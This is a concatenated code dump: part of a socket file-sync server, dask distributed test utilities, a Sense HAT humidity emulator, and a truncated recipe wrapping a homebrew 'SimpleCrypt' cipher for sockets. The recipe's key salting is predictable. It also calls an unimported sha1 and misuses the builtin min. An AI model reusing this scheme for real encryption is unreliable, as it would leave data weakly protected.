:param sleep: As the program is executed in local machine the network latency is almost none, sometimes forced latency is needed.
:return: Parse/combine all the messages with header size==self.HEADER_SIZE and return
"""
returnMsg = f"{len(return_msg):<{self.HEADER_SIZE}}" + return_msg
time.sleep(sleep)
sock.send(bytes(returnMsg, self.FORMAT))
# Compare the files from others against own dir,
# idea is to keep everything in sync and when mismatches are found, return then
def comparing_other_server_file_dir(self):
mismatches = []
# For smoke, there has to be fire
if not self.others_file_meta_data:
return []
own_file_metadata = self.own_file_meta_data[self.file_metadata_key]
for key in self.others_file_meta_data:
# If file found at other server but recently deleted from this server, ignore(Other servers aren't in sync)
# Do the same if the file is locked
if key in self.own_file_meta_data[self.deleted_key] or key in self.locked_file:
continue
# If file is missing from own metadata dictionary, add to mismatches
if key not in own_file_metadata:
mismatches.append(key)
continue
# If own file last modified time is older then add to mismatches
if own_file_metadata[key][0] < self.others_file_meta_data[key][0]:
mismatches.append(key)
return mismatches
# Each server invokes this thread as soon as they start
# Keep scanning for files in their own directory(then refresh the metadata database) as well as other server(s)
# takes a 5 sec nap in between
def get_synced(self):
while True:
# print("syncing started..")
self.scan_file_metadata()
self.fetch_from_other_server(meta_data=True)
mismatches = self.comparing_other_server_file_dir()
if mismatches:
print(mismatches)
file_names = "||".join(mismatches)
self.fetch_from_other_server(data_file=file_names)
# print("syncing finished..")
time.sleep(5)
# Below method deletes a file when the same file is deleted from other server(s) to be in sync
def delete_files(self, deleted):
for files in deleted:
if files in self.own_file_meta_data[self.file_metadata_key]:
if files not in self.locked_file:
self.delete_a_file(files)
else:
self.delete_queue.add(files)
print(self.delete_queue)
# delete a single file
def delete_a_file(self, file):
del self.own_file_meta_data[self.file_metadata_key][file]
self.file_metadata_index.remove(file)
file_name = f"{self.workingDir}/{file}"
if os.path.isfile(file_name):
os.remove(file_name)
# Interpret messages coming from clients
def interpret_message(self, message, metadata=False):
if metadata:
details_of_files = json.loads(message)
# print(details_of_files)
if details_of_files[self.deleted_key]:
self.delete_files(details_of_files[self.deleted_key])
self.others_file_meta_data = details_of_files[self.file_metadata_key]
# The below function will act like a client to the origin server and fetch fle info
def fetch_from_other_server(self, meta_data=False, data_file=""):
# Handle error when any destination is unreachable. People don't like to read red error messages. Be coool!
try:
socket = SocketClass('localhost', self.parallel_server_port)
except ConnectionRefusedError:
print(f"Connection was refused by localhost:{self.parallel_server_port}. Please check the connection.")
return
# Close the socket
def close_socket():
# print(f"Message received, closing the sync of {obj.PRT} socket")
socket.socket.close()
while True:
server_msg = socket.receive(socket.socket)
if server_msg == socket.CONNECTION_CLOSE:
return close_socket()
elif server_msg == socket.WELCOME:
if meta_data:
socket.send(self.metadata, socket.socket)
elif data_file:
socket.send(f"{self.file_data}:{data_file}", socket.socket)
data_file = ""
elif server_msg not in socket.messages:
self.interpret_message(server_msg, metadata=meta_data)
# elif server_msg in socket.messages[server_msg]:
# print(socket.messages[server_msg])
# Check for existing, new and deleted files. Stores at global var own_file_meta_data. Which has two keys.
# One for deleted files and another for existing and new files. self doesn't care about which files are new
# That's other servers' business
def scan_file_metadata(self):
self.scanning = True
tmp_file_meta_data = {}
tmp_file_metadata_index = []
deleted = []
for item in os.listdir(self.workingDir):
file_path = self.workingDir + "/" + item
if os.path.isfile(file_path):
tmp_file_meta_data[str(item)] = [os.path.getmtime(file_path), os.path.getsize(file_path)]
tmp_file_metadata_index.append(str(item))
# When there are files in directory, else add blank to all the file metadata variables
if self.own_file_meta_data:
old_file_meta_data = self.own_file_meta_data[self.file_metadata_key]
for key in old_file_meta_data:
if key not in tmp_file_meta_data:
deleted.append(key)
self.file_metadata_index.remove(key)
self.own_file_meta_data[self.deleted_key] = deleted
self.own_file_meta_data[self.file_metadata_key] = tmp_file_meta_data
self.file_metadata_index = tmp_file_metadata_index
# print(self.own_file_meta_data)
self.scanning = False
# One job of each server is to send the files that are requested by other server(s). The below function is for that
def send_files(self, file_names):
mismatches = []
print(f"The following files were received: {file_names}")
for files in file_names.split("||"):
mismatches.append(files)
result = file_exchange_client.send_all_files(self.workingDir, mismatches, self.file_excng_client_port)
if not result:
print("Got all files")
else:
print(f"The following files are not synced: {result}")
def create_json_dump(self):
if not self.locked_file:
return json.dumps(self.own_file_meta_data)
else:
output = {}
output[self.deleted_key] = self.own_file_meta_data[self.deleted_key]
output[self.file_metadata_key] = {}
for file in self.own_file_meta_data[self.file_metadata_key]:
if file not in self.locked_file:
output[self.file_metadata_key][file] = self.own_file_meta_data[self.file_metadata_key][file]
return json.dumps(output)
# the below function interprets the commands received from client
def parse_message(self, client_socket=socket):
close_the_socket = True
if self.command in self.accepted_commands:
if self.command == self.metadata:
# Server needs to wait while another thread is scanning the metadata
while self.scanning:
time.sleep(.01)
# If the server is scanning flag False, return the file metadata
return self.create_json_dump(), close_the_socket
elif self.command == self.client_command:
close_the_socket = False
while self.scanning:
time.sleep(.01)
return self.nicer(), close_the_socket
else:
close_the_socket = False
return self.INVALID_COMMAND, close_the_socket
elif self.command.split("-")[0].strip() == self.client_command:
close_the_socket = False
option, file_idx = self.command.split("-")[1], self.command.split("-")[2]
option, file_idx = option.strip(), file_idx.strip()
try:
file_idx = int(file_idx)
if file_idx >= len(self.file_metadata_index):
raise ValueError
file_name = self.file_metadata_index[file_idx]
if option == "unlock" and file_name not in self.locked_file:
raise ValueError
except ValueError:
close_the_socket = False
return self.INVALID_COMMAND, close_the_socket
while self.scanning:
time.sleep(.01)
if option == "lock":
self.locked_file.add(file_name)
return self.success, close_the_socket
elif option == "unlock":
self.locked_file.remove(file_name)
if file_name in self.delete_queue:
self.delete_a_file(file_name)
self.delete_queue.remove(file_name)
return self.success, close_the_socket
else:
close_the_socket = False
return self.INVALID_COMMAND, close_the_socket
elif self.command.split(":")[0] == self.file_data:
file_names = self.command.split(':')[1]
print(f"{time.ctime(time.time())}| request for file {file_names} has been received")
self.send_files(file_names)
return "Finished sending", close_the_socket
else:
close_the_socket = False
return self.INVALID_COMMAND, close_the_socket
def handle_client(self, client_socket):
# Send the welcome message
self.send(self.WELCOME, client_socket)
while True:
self.command = self.receive(client_socket)
if self.command:
if self.command.strip() == self.exit:
close_the_socket = True
else:
return_msg, close_the_socket = self.parse_message()
self.send(return_msg, client_socket, self.DELAY_TIME)
# For claen exit
if close_the_socket:
self.send(self.CONNECTION_CLOSE, client_socket, self.DELAY_TIME)
client_socket.close()
return
def start(self):
""" :job: Starts three different types of threads,
last one connects with the client, recv command from client, parse the command and respond back
:returns: None
"""
# Thread Type1: Accept files from other server
file_exchange_thread = threading.Thread(
target=file_exchange_server.receiver, args=(self.workingDir, self.file_excng_server_port,)
)
file_exchange_thread.start()
# Thread Type2: Continue the syncing process every 5 secs
server_thread = threading.Thread(target=self.get_synced)
server_thread.start()
# Thread Type2: Get the client details after accepting a request and send the welcome message
while True:
client_socket, (clientAdd, clientPort) = self.socket.accept()
# print(f"{time.ctime(time.time())}| connection from {clientAdd, clientPort} has been established")
thread = threading.Thread(target=self.handle_client, args=(client_socket,))
thread.start()
active_count = threading.active_count() - 1
# print(f"Number of Threads active:{active_count}")
def nicer(self):
""" :return: human readable metadata of all the files in the system master directory """
res = ""
# Fetch the file metadata from global obj variable file_metadata_key
file_list = self.own_file_meta_data[self.file_metadata_key]
index = 0
try:
for file in self.file_metadata_index:
# Get the metadata of each file
file_name = file
last_modified_time = file_list[file][0]
size = file_list[file][1]
# Convert the metadata into human readable format
readable_time = self.get_file_datetime(last_modified_time)
readable_size = self.human_readable_bytes(size)
# Add if any file is locked
locked_status = "|| [Locked]" if file in self.locked_file else ""
# Append with final result
res += f'[{index}]||{readable_time}||{readable_size}||{file_name}{locked_status}\n'
index += 1
if not res:
res = "|| || ||\n"
except KeyError:
print(self.own_file_meta_data)
return "|| || ||\n"
return res
# returns human readable datetime
def get_file_datetime(self, time_second):
"""
:param time_second: Last modification time of a file in second with decimal value
:return: datetime in format like : Mon Aug 30 14:48:46 2021
"""
return time.ctime(time_second)
# Below code was copied from stackoverflow. Link is given
# https://stackoverflow.com/questions/12523586/python-format-size-application-converting-b-to-kb-mb-gb-tb/63839503
def human_readable_bytes(self, size):
"""
:param self: object of either ServerA or ServerB
:param size: The size of a file in byte
:return: most feasible human friendly KB, MB, GB, or TB string
"""
B = float(size)
KB = float(1024)
MB = float(KB ** 2) # 1,048,576
GB = float(KB ** 3) # 1,073,741,824
TB = float(KB ** 4) # 1,099,511,627,776
if B < KB:
return_str = '{0} {1}'.format(B, 'Bytes' if 0 == B > 1 else 'Byte')
elif KB <= B < MB:
return_str = '{0:.2f} KB'.format(B / KB)
elif MB <= B < GB:
return_str = '{0:.2f} MB'.format(B / MB)
elif GB <= B < TB:
return_str = '{0:.2f} GB'.format(B / GB)
elif TB <= B:
return_str = '{0:.2f} TB'.format(B / TB)
# Return a string of length 15. If len(return_str) < 15 then add spaces at the end
return return_str + " " * (15 - len(return_str))
|
test_utils_test.py | import asyncio
import os
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
import dask
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
return dask.config
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
assert foo is True
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
assert foo is True
assert bar is False
@gen_test()
async def test_gen_test_pytest_fixture(tmp_path, c):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_wait_for_port():
t1 = time()
with pytest.raises(RuntimeError):
wait_for_port((get_ip(), 9999), 0.5)
t2 = time()
assert t2 - t1 >= 0.5
with _listen(0) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 1.0
with _listen(1) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 2.0
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
def test__UnhashableCallable():
func = _UnhashableCallable()
assert func(1) == 2
with pytest.raises(TypeError, match="unhashable"):
hash(func)
class MyServer(Server):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.handlers["ping"] = self.pong
self.counter = 0
def pong(self, comm):
self.counter += 1
return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
a = await MyServer({})
await a.listen(0)
read_event = asyncio.Event()
read_event.set()
read_queue = asyncio.Queue()
original_pool = a.rpc
a.rpc = _LockedCommPool(original_pool, read_event=read_event, read_queue=read_queue)
b = await MyServer({})
await b.listen(0)
# Event is set, the pool works like an ordinary pool
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
assert res == "pong"
assert b.counter == 1
read_event.clear()
# Can also be used without a lock to intercept network traffic
a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
a.rpc.remove(b.address)
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
read_event = asyncio.Event()
read_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
# We didn't block the write but merely the read. The remove should have
# received the message and responded already
while not b.counter:
await asyncio.sleep(0.001)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
assert await read_queue.get() == (b.address, "pong")
read_event.set()
assert await fut == "pong"
@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
write_event = asyncio.Event()
write_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
# Write was blocked. The remote hasn't received the message, yet
assert b.counter == 0
assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
write_event.set()
assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
sleep_time = 30
async def inner_test(c, s, a, b):
await asyncio.sleep(sleep_time)
# This timeout includes cluster startup and teardown which sometimes can
# take a significant amount of time. For this particular test we would like
# to keep the _test timeout_ small because we intend to trigger it but the
# overall timeout large.
test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
inner_test
)
try:
with pytest.raises(asyncio.TimeoutError) as exc:
test()
assert "inner_test" in str(exc)
assert "await asyncio.sleep(sleep_time)" in str(exc)
except gen.TimeoutError:
pytest.xfail("Cluster startup or teardown took too long")
_, dirs, files = next(os.walk(tmp_path))
assert not dirs
assert files == [inner_test.__name__ + ".yaml"]
import yaml
with open(tmp_path / files[0], "rb") as fd:
state = yaml.load(fd, Loader=yaml.Loader)
assert "scheduler" in state
assert "workers" in state
def test_assert_worker_story():
now = time()
story = [
("foo", "id1", now - 600),
("bar", "id2", now),
("baz", {1: 2}, "id2", now),
]
# strict=False
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
assert_worker_story(story, [])
assert_worker_story(story, [("foo",)])
assert_worker_story(story, [("foo",), ("bar",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo", "nomatch")])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", {1: 3})])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
assert_worker_story([], [])
assert_worker_story([("foo", "id1", now)], [("foo",)])
with pytest.raises(AssertionError):
assert_worker_story([], [("foo",)])
# strict=True
assert_worker_story([], [], strict=True)
assert_worker_story([("foo", "id1", now)], [("foo",)])
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",)], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [], strict=True)
@pytest.mark.parametrize(
"story",
[
[()], # Missing payload, stimulus_id, ts
[("foo",)], # Missing (stimulus_id, ts)
[("foo", "bar")], # Missing ts
[("foo", "bar", "baz")], # ts is not a float
[("foo", "bar", time() + 3600)], # ts is in the future
[("foo", "bar", time() - 7200)], # ts is too old
[("foo", 123, time())], # stimulus_id is not a string
[("foo", "", time())], # stimulus_id is an empty string
[("", time())], # no payload
[("foo", "id", time()), ("foo", "id", time() - 10)], # timestamps out of order
],
)
def test_assert_worker_story_malformed_story(story):
with pytest.raises(AssertionError, match="Malformed story event"):
assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == {a.address, b.address}
@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
await dump_cluster_state(s, [], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"] == {}
@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == s.workers.keys()
@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
a.stop()
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][a.address], dict)
assert isinstance(out["workers"][b.address], dict)
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "200ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
addr1, addr2 = s.workers
clog_fut = asyncio.create_task(
c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[addr1])
)
await asyncio.sleep(0.2)
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][addr2], dict)
assert out["workers"][addr1].startswith("OSError('Timed out trying to connect to")
clog_fut.cancel()
|
humidity.py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Raspberry Pi Sense HAT Emulator library for the Raspberry Pi
# Copyright (c) 2016 Raspberry Pi Foundation <info@raspberrypi.org>
#
# This package is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This package is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
nstr = str
str = type('')
import sys
import os
import io
import mmap
import errno
from struct import Struct
from collections import namedtuple
from random import Random
from time import time
from threading import Thread, Event
from math import isnan
import numpy as np
from .common import clamp
# See HTS221 data-sheet for details of register values
HUMIDITY_FACTOR = 256
TEMP_FACTOR = 64
HUMIDITY_DATA = Struct(nstr(
'@' # native mode
'B' # humidity sensor type
'6p' # humidity sensor name
'B' # H0
'B' # H1
'H' # T0
'H' # T1
'h' # H0_OUT
'h' # H1_OUT
'h' # T0_OUT
'h' # T1_OUT
'h' # H_OUT
'h' # T_OUT
'B' # H_VALID
'B' # T_VALID
))
HumidityData = namedtuple('HumidityData', (
'type', 'name', 'H0', 'H1', 'T0', 'T1', 'H0_OUT', 'H1_OUT',
'T0_OUT', 'T1_OUT', 'H_OUT', 'T_OUT', 'H_VALID', 'T_VALID')
)
def humidity_filename():
"""
Return the filename used to represent the state of the emulated sense HAT's
humidity sensor. On UNIX we try ``/dev/shm`` then fall back to ``/tmp``; on
Windows we use whatever ``%TEMP%`` contains
"""
fname = 'rpi-sense-emu-humidity'
if sys.platform.startswith('win'):
# just use a temporary file on Windows
return os.path.join(os.environ['TEMP'], fname)
else:
if os.path.exists('/dev/shm'):
return os.path.join('/dev/shm', fname)
else:
return os.path.join('/tmp', fname)
def init_humidity():
"""
Opens the file representing the state of the humidity sensor. The
file-like object is returned.
If the file already exists we simply make sure it is the right size. If
the file does not already exist, it is created and zeroed.
"""
try:
# Attempt to open the humidity sensor's file and ensure it's the right
# size
fd = io.open(humidity_filename(), 'r+b', buffering=0)
fd.seek(HUMIDITY_DATA.size)
fd.truncate()
except IOError as e:
# If the screen's device file doesn't exist, create it with reasonable
# initial values
if e.errno == errno.ENOENT:
fd = io.open(humidity_filename(), 'w+b', buffering=0)
fd.write(b'\x00' * HUMIDITY_DATA.size)
else:
raise
return fd
class HumidityServer(object):
def __init__(self, simulate_noise=True):
self._random = Random()
self._fd = init_humidity()
self._map = mmap.mmap(self._fd.fileno(), 0, access=mmap.ACCESS_WRITE)
data = self._read()
if data.type != 2:
self._write(HumidityData(2, b'HTS221', 0, 100, 0, 100, 0, 25600, 0, 6400, 0, 0, 0, 0))
self._humidity = 45.0
self._temperature = 20.0
else:
self._humidity = data.H_OUT / HUMIDITY_FACTOR
self._temperature = data.T_OUT / TEMP_FACTOR
self._noise_thread = None
self._noise_event = Event()
self._noise_write()
# The queue lengths are selected to accurately represent the response
# time of the sensors
self._humidities = np.full((10,), self._humidity, dtype=np.float)
self._temperatures = np.full((31,), self._temperature, dtype=np.float)
self.simulate_noise = simulate_noise
def close(self):
if self._fd:
self.simulate_noise = False
self._map.close()
self._fd.close()
self._fd = None
self._map = None
def _perturb(self, value, error):
"""
Return *value* perturbed by +/- *error* which is derived from a
gaussian random generator.
"""
# We use an internal Random() instance here to avoid a threading issue
# with the gaussian generator (could use locks, but an instance of
# Random is easier and faster)
return value + self._random.gauss(0, 0.2) * error
def _read(self):
return HumidityData(*HUMIDITY_DATA.unpack_from(self._map))
def _write(self, value):
HUMIDITY_DATA.pack_into(self._map, 0, *value)
@property
def humidity(self):
return self._humidity
@property
def temperature(self):
return self._temperature
def set_values(self, humidity, temperature):
self._humidity = humidity
self._temperature = temperature
if not self._noise_thread:
self._noise_write()
@property
def simulate_noise(self):
return self._noise_thread is not None
@simulate_noise.setter
def simulate_noise(self, value):
if value and not self._noise_thread:
self._noise_event.clear()
self._noise_thread = Thread(target=self._noise_loop)
self._noise_thread.daemon = True
self._noise_thread.start()
elif self._noise_thread and not value:
self._noise_event.set()
self._noise_thread.join()
self._noise_thread = None
self._noise_write()
def _noise_loop(self):
while not self._noise_event.wait(0.13):
self._noise_write()
def _noise_write(self):
if self.simulate_noise:
self._humidities[1:] = self._humidities[:-1]
self._humidities[0] = self._perturb(self.humidity, (
3.5 if 20 <= self.humidity <= 80 else
5.0))
self._temperatures[1:] = self._temperatures[:-1]
self._temperatures[0] = self._perturb(self.temperature, (
0.5 if 15 <= self.temperature <= 40 else
1.0 if 0 <= self.temperature <= 60 else
2.0))
humidity = self._humidities.mean()
temperature = self._temperatures.mean()
else:
humidity = self.humidity
temperature = self.temperature
self._write(self._read()._replace(
H_VALID=not isnan(humidity),
T_VALID=not isnan(temperature),
H_OUT=0 if isnan(humidity) else int(clamp(humidity, 0, 100) * HUMIDITY_FACTOR),
T_OUT=0 if isnan(temperature) else int(clamp(temperature, -40, 120) * TEMP_FACTOR),
))
|
recipe-577212.py | import time, hashlib, base64
from array import array
from SimpleCrypt import SimpleCrypt
"""
SimpleCryptSockeExt
Author: AJ Mayorga
Date: 4/30/2010
Having posted SimpleCrypt http://code.activestate.com/recipes/577174/ I wanted
to follow with an implementation example, specifically for use in Client/Server
solutions and keep it simple and as close to a drop-in solution as possible.
Design Goals:
- Create a generic SimpleCrypt wrapper for use in solutions such as:
- HTTP,RAW,FTP,DNS,etc
- Support TCP or UDP
- Internal checking of data integrity and error recovery
- Demonstrate various implementations for SALTing encrypted data streams
- SimpleCrypt allows for not only SALTing key values
but algorithm configuration as well
Enjoy, as always feedback welcome
"""
class SimpleCryptSocketExt(SimpleCrypt):
def __init__(self, kwargs):
SimpleCrypt.__init__(self, **kwargs)
self.name = str(self.__class__).split(".")[1]
self.SeedValues = ["Iliana","Chandra","Elspeth", "Sorrin", "Bob"]
self.SeedData = ""
self.salt_method = None
self.idx = 0
self.Counter = 0
self.Debug = False
self.Errors = 0
self.MaxRetries = 3
self.HMAC = ""
self.BlockEndMarker = "ZZ"
def Encode(self, data, mode="Hex"):
if mode == "Hex":
return data.encode('hex')
elif mode == "B64":
return base64.b64encode(data)
def Decode(self, data, mode="Hex"):
if mode == "Hex":
return data.decode('hex')
elif mode == "B64":
return base64.b64decode(data)
def ShowInitVars(self, label):
label = label.upper()
print "\n","#"*80,"\n"
print label," Key: ",self.key.encode('hex')
print label," Cycles: ",self.cycles
print label," BlockSz: ",self.block_sz
print label," KeyAdv: ",self.key_advance
print label," KeyMag: ",self.key_magnitude
print label," SeedData: ",self.Encode(self.SeedData),"\n"
if label.find("ENCRYPT") != -1:
for idx in range(len(self.eKeys)):
print label," eKey",idx,": ",self.eKeys[idx].tostring().encode('hex')
elif label.find("DECRYPT") != -1:
for idx in range(len(self.dKeys)):
print label," dKey",idx,": ",self.dKeys[idx].tostring().encode('hex')
print label," HMAC : ",self.HMAC
print "\n","#"*80,"\n"
"""
Method that salts SimpleCrypt vars according to preset
seed values and preset routines, overtime this implementation can prove
predictable.
"""
def SimpleSalt(self):
self.idx = (self.idx+1,0)[self.idx>=len(self.SeedValues)-1]
key = self.key+self.SeedValues[self.idx]+str(self.Counter)
ARGS = dict()
ARGS['Key'] = sha1(key).digest()
self.Counter += 21+len(self.SeedValues[self.idx])
self.ReInit(ARGS)
"""
Implementation that salts the SimpleCrypt vars according to time values
this demo is set to change keys every min, for everyday of the year.
this implementation works really well, but only if you have a good NTP setup
"""
def NTPSalt(self):
year,month,day,hour,minute,sec,wday,yday,dst = time.localtime()
key = self.key+str(self.Counter)
ARGS = dict()
ARGS['Key'] = ''.join([str(x) for x in (self.key,year,month,day,hour,min)])
ARGS['Cycles'] = max(wday+1, 3)
ARGS['BlockSz'] = month*128
ARGS['KeyAdv'] = yday
ARGS['KeyMag'] = min(int(ARGS['Cycles']/2)+1, ARGS['Cycles'])
self.Counter += 21+sec+yday-min
self.ReInit(ARGS)
"""
Method to salt SimpleCrypt vars using previous data, this definately is the
